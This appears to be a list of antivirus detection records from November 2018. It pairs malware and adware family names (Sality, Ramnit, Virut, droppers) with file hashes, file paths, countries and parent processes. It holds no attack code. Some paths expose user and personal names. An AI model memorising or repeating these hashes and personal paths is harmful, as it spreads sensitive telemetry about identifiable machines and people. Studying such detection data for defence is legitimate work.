  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-01T07:43:30Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-01T20:44:08Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-01T19:01:17Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-183953-34cee014', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_aa90a24e\\AVSCAN-20181101-183912-2FB696B0\\AVSCAN-20181101-183953-34CEE014', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T17:39:53Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='jetzt_installieren.exe', filepath='E:\\NEW Down\\jetzt_installieren.exe', filesize=516000, name='PUA/DownloadGuide.Gen.#M300.#R6384'), hash='6b781e4a9d0d246ff327d00170df388d3ec7db4aadedb5906485bcd3098fe3b6', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Total.Commander.6.54a\\TOTALCMD.EXE', parentsize=842788, timestamp='2018-11-01T16:47:06Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='wizinstaller.exe', filepath='D:\\FILE\\win10pro แผ่นมากับคอมฯ\\sources\\$OEM$\\$$\\System32\\asg\\WizInstaller\\x86\\WizInstaller.exe', filesize=256000, name='W32/Infector.Gen.#M300.#R7863'), hash='20e9c72a7b16d0a91543d9447db46379b3a9fe460e1cbb7174f1a242a3fbf86b', metadata=Row(cmdline=None, country='TH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T03:37:56Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181102-000045-3accc096', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_6c2d1c76\\AVSCAN-20181102-000031-386F608C\\AVSCAN-20181102-000045-3ACCC096', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T17:01:41Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-111912-e8305d77', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_0968cd38\\AVSCAN-20181101-111825-E388B35E\\AVSCAN-20181101-111912-E8305D77', filesize=512000, name='PUA/DownloadSponsor.Gen.#M300.#R5738'), hash='7cfbe228740d995a5a99972e9e7fc5849f8de1bbdea59dfcab61d15ec902eee3', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T10:19:10Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='fusion.dll', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\nsb56E0.tmp\\Fusion.dll', filesize=896000, name='PUA/InstallCore.#M1.#R1'), hash='dcd335936e7fd1dba32881dcff49de018a24583a88ba6f4d7b1592ab9f7983b3', metadata=Row(cmdline=None, country='AT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Users\\X\\Downloads\\Fotor3_3.4.1_163.15_win32_x64_official.exe', parentsize=268416568, timestamp='2018-11-01T10:23:41Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='winword.exe', filepath='C:\\Program Files\\Microsoft Office\\OFFICE11\\WINWORD.EXE', filesize=12380000, name='W32/Sality.AT.#M1.#R1'), hash='ec59c65d6066a84f6ff92def38fbf1792a5f44ac81eb7490a8d3fd47be7448cd', metadata=Row(cmdline=None, country='UA', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T15:07:14Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='installe.', filepath='CLICK_HE.APP/CONTENTS/MACOS/INSTALLE.', filesize=196000, name='Adware/OSX.Genieo.lvmpr.#M0.#R0'), hash='b3905883dd74ad5d2e92d9824b8110b0d06a0cf0fd18a36f8bf82ffa0a954a6e', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='16', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-01T23:29:55Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='gcaclientdll.dll', filepath='E:\\Program Files (x86)\\LANGames\\gcaclientdll.dll', filesize=128000, name='W32/Ramnit.CD.#M1.#R1'), hash='9a463b51b6d9cda67bd20dd63a75c22fc6f252da0b3d43386a478397bd825cc5', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Mozilla Firefox\\firefox.exe', parentsize=450512, timestamp='2018-11-01T07:35:54Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='_isdel.exe', filepath='C:\\CIMCO.old\\DNCMax7\\Utils\\Ipc-das-i7000\\_ISDel.exe', filesize=64000, name='W32/Alman.BB.#M1.#R1'), hash='dbe6256828aaab5d3b0dc7fbc48950dab85a8733aa14b2562740f418a52d6a97', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T20:02:40Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='msinfo32.exe', filepath='\\\\?\\C:\\Windows\\system32\\msinfo32.exe', filesize=320000, name='W32/Virut.Gen.#M1.#R1'), hash='e2a74da78f36c3d50e4daf704af997b27bdfda2047389a386fc6aeb6fef54355', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T15:30:34Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='curricula base.exe', filepath='E:\\Didattica\\Sgb\\condivisa\\DOTE UNICA LAVORO NUOVA 2016-2018\\ADESIONI DUL\\BONANDRINI FABIO\\CURRICULA BONANDRINI\\CURRICULA BASE.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='dbbba6122f8e506938da13a7b6a38c765c4600d8db1ef90d90e2c97600adb0b1', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T20:06:31Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='fusion.dll', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\nsqBC17.tmp\\Fusion.dll', filesize=896000, name='PUA/InstallCore.#M1.#R1'), hash='dcd335936e7fd1dba32881dcff49de018a24583a88ba6f4d7b1592ab9f7983b3', metadata=Row(cmdline=None, country='AT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Users\\X\\AppData\\Local\\Temp\\DMR\\Downloads\\152e221a8bef8d2d13c58f995563a1a1\\bdcc004788f23fa84093878d20692eaa\\Fotor3_3.4.1_163.15__win32_x64_official__1_.exe', parentsize=268416568, timestamp='2018-11-01T16:59:23Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-152943-e22d1539', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_3db4e496\\AVSCAN-20181101-145735-7096FD0F\\AVSCAN-20181101-152943-E22D1539', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='d9d8fcfcdf53b63ec7a8dfd24a2086e31f8c19e146ac30e3af30e293c84fa17b', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:29:50Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='pcr2                                   .scr', filepath='E:\\Proyecto\\PCR2                                   .scr', filesize=64000, name='W32/Sality.K.#M1.#R1'), hash='e562a79153316650e911a59240cf1949e94b5b45d5e72143edefd294716ab455', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T16:12:06Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='setup337.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\h5mjjn1rsql\\Setup337.exe', filesize=1472000, name='TR/Dropper.MSIL.Gen.#M300.#R5304'), hash='d4db4d74240a34b066207a80080cadd428136c7dd2b8b60d08d42f7559f37e4e', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:46:53Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-163856-0c84670f', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_2c1cb59c\\AVSCAN-20181101-163816-06267E2D\\AVSCAN-20181101-163856-0C84670F', filesize=1472000, name='TR/Dropper.MSIL.Gen.#M1.#R1'), hash='d4db4d74240a34b066207a80080cadd428136c7dd2b8b60d08d42f7559f37e4e', metadata=Row(cmdline=None, country='AE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T11:08:23Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='setup337.exe', filepath='H:\\Users\\X\\AppData\\Local\\Temp\\l4eirefearc\\Setup337.exe', filesize=1472000, name='TR/Dropper.MSIL.Gen.#M300.#R5304'), hash='d4db4d74240a34b066207a80080cadd428136c7dd2b8b60d08d42f7559f37e4e', metadata=Row(cmdline=None, country='AE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2868224, timestamp='2018-11-01T04:49:26Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='uepdorimdg.exe', filepath='C:\\Users\\user2\\AppData\\Local\\Temp\\mylbotmslqts\\uepdorimdg.exe', filesize=512000, name='TR/Taranis.2886.#M0.#R0'), hash='eeb30022f7c3503064471543d222174092dacb7e964ee1ea21f0c4fe8a60e3ec', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-01T04:20:20Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='system volume information                                   .scr', filepath='E:\\System Volume Information                                   .scr', filesize=64000, name='W32/Sality.K.#M1.#R1'), hash='e562a79153316650e911a59240cf1949e94b5b45d5e72143edefd294716ab455', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\explorer.exe', parentsize=3932672, timestamp='2018-11-01T19:35:00Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='$rjl80de', filepath='C:\\$Recycle.Bin\\S-1-5-21-1024011789-1237596223-2747892489-21661\\$RJL80DE', filesize=64000, name='HEUR/Macro.Downloader.PAAJ.Gen.#M1.#R1'), hash='90ce259cefd378651b6877fd42418775c3ad0aa752713a5761a068fa403a22d4', metadata=Row(cmdline=None, country='RO', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\totalcmd\\TOTALCMD64.EXE', parentsize=8694408, timestamp='2018-11-01T15:16:13Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='esercizi vari.exe', filepath='E:\\Didattica\\Sgb\\condivisa\\SORZI\\TUTTO STORICO\\ENGIM\\MATERIALE DIDATTICO\\tutto informatica engim\\ESERCIZI INFORMATICA\\esercizi vari.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='dbbba6122f8e506938da13a7b6a38c765c4600d8db1ef90d90e2c97600adb0b1', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T20:30:58Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-073538-10ca092c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_08baa923\\AVSCAN-20181101-073454-0BE3AB17\\AVSCAN-20181101-073538-10CA092C', filesize=1536000, name='TR/Crypt.XPACK.Gen.#M1.#R1'), hash='e382b2754e9d655c30e73005ff3bdae57ca33692baa8bb3d26b327d341bd1067', metadata=Row(cmdline=None, country='NP', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T01:50:49Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='contratto.exe', filepath='E:\\Didattica\\Sgb\\condivisa\\SORZI\\TUTTO STORICO\\ENGIM\\DOCENZE\\CORSO CARVICO\\CONTRATTI CON AZIENDA\\CONTRATTO.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='dbbba6122f8e506938da13a7b6a38c765c4600d8db1ef90d90e2c97600adb0b1', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T20:22:58Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='inv.48.ts.xls', filepath='D:\\СОФТ\\ФЛЕШКА\\надежда\\тарифная\\шаблоны с ЕИАС\\мониторинг выполн.произв программ в теплоснабжении\\INV.48.TS.xls', filesize=1792000, name='X2000M/Agent.3997.#M1.#R1'), hash='913e5ae8fa59e24bc6a3fa8eb354304469a5c22cdae47e6ef7d158189849fa81', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe3_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe3 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='RU', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-01T17:36:45Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='minipure.exe', filepath='c:\\program files\\smartcloudinput\\1.3.5.10910\\minipure.exe', filesize=2216000, name='PUA/Softcnapp.#M1.#R1'), hash='d459c3ef5011147cda165096d073d3ff14cb504ed1abc1f88638508c4705b41c', metadata=Row(cmdline=None, country='CN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2616320, timestamp='2018-11-01T08:15:04Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='pconverter.86bb86adb57c4ce4b04687fad38c43bf.exe', filepath='C:\\Users\\X\\AppData\\Local\\microsoft\\Windows\\temporary internet files\\Content.IE5\\KV3KB7H8\\pconverter.86bb86adb57c4ce4b04687fad38c43bf.exe', filesize=376000, name='PUA/MyWebSearch.Gen.#M300.#R6777'), hash='a36c690c41d2651fe6a2e5f9d785ac213521e3b62107bb5a7b6b4ee4372a5b75', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=None, timestamp='2018-11-04T14:17:25Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='yahoo! powered fotec', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered fotec', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='a25a376c309db55fbf6556610e23f3b1b3692e233d3b7d2387b8f5e8366965dc', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T02:55:48Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='gcaclientdll.dll', filepath='C:\\Program Files (x86)\\Garena Plus\\Room\\gcaclientdll.dll', filesize=128000, name='W32/Ramnit.CD.#M1.#R1'), hash='166cc02d31acea15ad5a0af21e30e3363b43fb5f611b2ad2bf76d8f50a746b89', metadata=Row(cmdline='aepdu.dll,AePduRunUpdate', country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\rundll32.exe', parentsize=44544, timestamp='2018-11-04T20:42:41Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='c:\\program files (x86)\\avira\\antivirus\\avirasecuritycenteragent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline='\\/LOGFILE=\\"C:\\\\ProgramData\\\\Avira\\\\Antivirus\\\\LOGFILES\\\\AviraSecurityCenterAgent-2018-10-29-09-10-30.log\\" \\/LOGLEVEL=\\"STANDARD\\" \\/UPDATE_WSC=\\"ENABLE\\" \\/VDFDATE=\\"2018-10-24T00:00:00\\" \\/TRIGGER=\\"gpschd.dll Cyclic Check\\"', country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Avira\\Antivirus\\sched.exe', parentsize=248312, timestamp='2018-11-04T01:47:52Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='castsrv.exe', filepath='C:\\Windows\\SoftwareDistribution\\Download\\40e0103692e1ebbb162ed295f786b047\\x86_Microsoft-Windows-Client-Features-Package~~X86~~10.0.17134.1\\x86_microsoft-windows-castserver_31bf3856ad364e35_10.0.17134.1_none_510114d1e1d1b62a\\castsrv.exe', filesize=60000, name='TR/Crypt.XPACK.Gen3.#M300.#R200156'), hash='77a7de2f5473a3d62582bcc5bae9c97a861511f671f6c7b84f365b56f36f29c7', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T15:20:45Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='C:\\Windows\\System32\\MaintenancesServices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='BD', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\lsass.exe', parentsize=None, timestamp='2018-11-04T09:19:46Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='msinfo32.exe', filepath='C:\\Windows\\System32\\msinfo32.exe', filesize=320000, name='W32/Virut.Gen.#M1.#R1'), hash='137e9f3a29c0dbea1e928b20a4ef1e562c63ff12ab657865479d9bc28171fdd1', metadata=Row(cmdline='-k LocalSystemNetworkRestricted', country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-04T09:49:26Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='~6e4c7221.tmp', filepath='/Users/ralfdressler/Dropbox/.dropbox.cache/~6e4c7221.tmp', filesize=128000, name='HEUR/AGEN.1008383.#M15.#R1008383'), hash='813279b1aee8249802ea399c68af28e6df334a393b3804d3e11c83e788bc4fc8', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='15', os_vminor='6', parentproc=None, parentsize=None, timestamp='2018-11-04T06:11:47Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-202348-8a3827c0', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_12120c46\\AVSCAN-20181104-202122-683E7302\\AVSCAN-20181104-202348-8A3827C0', filesize=384000, name='TR/Flooder.384000.#M1.#R1'), hash='06c39f81fc1037e75a0a2895981d584f6facb5a355f744d79154a57d41edff89', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T20:23:47Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='mnnstubsetup.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\tmp7573437\\MNNStubSetup.exe', filesize=576000, name='HEUR/AGEN.1000022.#M1.#R1'), hash='182b23d0401d9ccd8adcc7da4cf30f1d174420f216f3f3e85661ccd9b044e446', metadata=Row(cmdline='\\\\\\/RSF \\\\\\/ppn:T3RNZyFaKB9EbHY2 \\\\\\/mnl', country='ID', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Users\\X\\Downloads\\Programs\\Nox App Player 6.2.3.9_3784294985.exe', parentsize=2414156, timestamp='2018-11-04T10:59:12Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-090251-85f423c8', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_396c2e7c\\AVSCAN-20181104-084957-1E887E53\\AVSCAN-20181104-090251-85F423C8', filesize=892000, name='ADWARE/Spigot.892000.#M1.#R1'), hash='9559dc925a2a572eeeff7b5d42e1aabe49cc80f1b149b4d09d9acd8e801ff827', metadata=Row(cmdline=None, country='PH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T01:09:38Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-190920-74e0b649', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_3b095aae\\AVSCAN-20181104-175338-16439388\\AVSCAN-20181104-190920-74E0B649', filesize=172000, name='PUA/MPCCleaner.#M1.#R1'), hash='398b9784731795a2a9159ae69dea840751d74fbe0f64b1e1929ea2fce6c6f138', metadata=Row(cmdline=None, country='PL', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-04T18:09:18Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='giao an lop 5 ca nam 20172018 soan rat chi tiet cktkn gdkns gdbvmt bien dao.exe', filepath='G:\\\xa0\\NAM HOC 2017-2018n\\Giao an lop 5 ca nam 20172018 soan rat chi tiet CKTKN GDKNS GDBVMT bien dao.exe', filesize=3456000, name='TR/ATRAPS.Gen4.#M300.#R300784'), hash='4b5623ed6d755e5d916540b19be673c5c238a553fe194d57cd0137d382532598', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Microsoft Security Client\\MsMpEng.exe', parentsize=119864, timestamp='2018-11-04T11:17:04Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp0001928e', filepath='C:\\Windows\\Temp\\bdcore_tmp\\2532\\tmp000004cb\\tmp0001928e', filesize=256000, name='HEUR/AGEN.1014173.#M1.#R1'), hash='9c4d032e352d7f2bf17d974642258620bff3144a84199019f5cbe1053932c674', metadata=Row(cmdline=None, country='IR', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Program Files\\Bitdefender\\Endpoint Security\\epsecurityservice.exe', parentsize=98136, timestamp='2018-11-04T20:09:35Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-122000-8899a176', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_24c2bae8\\AVSCAN-20181104-121126-1AF5F320\\AVSCAN-20181104-122000-8899A176', filesize=788000, name='PUA/DNSBlock.#M1.#R1'), hash='6fed83ce7f539d48185dc7329823f199c509f9c04401cdfb82b83140f4bf74f6', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T11:02:28Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='optpphrl.exe', filepath='F:\\RECYCLER_DETEC\\S-3-8-65-8402467574-3770633725-252716346-1347\\OPTpphrL.exe', filesize=128000, name='TR/Krypt.lkfna.#M1.#R1'), hash='59a81ef27e74c2daa7f02178ab82d5925ba9e7be88bf43ce249b8f116e8914a5', metadata=Row(cmdline='rtp', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Smadav\\SMΔRTP.exe', parentsize=1552384, timestamp='2018-11-04T12:57:16Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='nod32.exe', filepath='\\\\?\\D:\\util\\Antivirus & security\\ESET\\nod32.exe', filesize=496000, name='W32/Sality.Patched.#M1.#R1'), hash='675a8777521c026af2c9c99e72bc4e7839d0edb4e9f2b41d8ad37836c93d3d0b', metadata=Row(cmdline=None, country='IR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T11:09:08Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-131056-15d310fe', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_e41ed6c7\\AVSCAN-20181104-130254-F168F468\\AVSCAN-20181104-131056-15D310FE', filesize=704000, name='Worm/IRCBot.ms.70.#M1.#R1'), hash='9bae2ceb5837b566649673b6901c8972db02bace8d10a9c9fbdc32fab0b5988f', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T19:10:54Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='powershell.exe', filepath='C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe', filesize=512000, name='W32/Virut.Gen.#M1.#R1'), hash='9a4079b38c42774a86baa3a839e2a0458d874a6dfd75183e1b58125dddc0c650', metadata=Row(cmdline='-k LocalSystemNetworkRestricted', country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-04T20:12:04Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='опись документов 2.2.exe', filepath='\\\\?\\F:\\Проф\\Опись документов 2.2.exe', filesize=1664000, name='TR/ATRAPS.Gen4.#M300.#R300784'), hash='7e182aaf57155e67af0646ce8836bc8ea908644d83c6c6a473397940503af9f8', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T12:36:31Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-131816-371adfa1', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_e41ed6c7\\AVSCAN-20181104-130254-F168F468\\AVSCAN-20181104-131816-371ADFA1', filesize=704000, name='Worm/IRCBot.ms.70.#M1.#R1'), hash='9bae2ceb5837b566649673b6901c8972db02bace8d10a9c9fbdc32fab0b5988f', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T19:18:15Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='00001885.exe', filepath='\\\\?\\D:\\KDR\\exe\\00001885.exe', filesize=320000, name='TR/Crypt.XPACK.Gen.#M300.#R2936'), hash='a2c93ca7a467344c5e2c696ffb9991fa2373652df8a5f2452f14085ed4b2c4d0', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T13:42:50Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='c3a1132288e96fe91a32c23fc02893891960b16442999556138d832d835c4a18', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_31.10.2018-33.categorizing\\C3A1132288E96FE91A32C23FC02893891960B16442999556138D832D835C4A18', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='c3a1132288e96fe91a32c23fc02893891960b16442999556138d832d835c4a18', metadata=Row(cmdline='-r', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Kaspersky Lab\\Kaspersky Internet Security 18.0.0\\avp.exe', parentsize=354672, timestamp='2018-11-04T16:18:29Z'), dt=datetime.date(2018, 11, 4)),
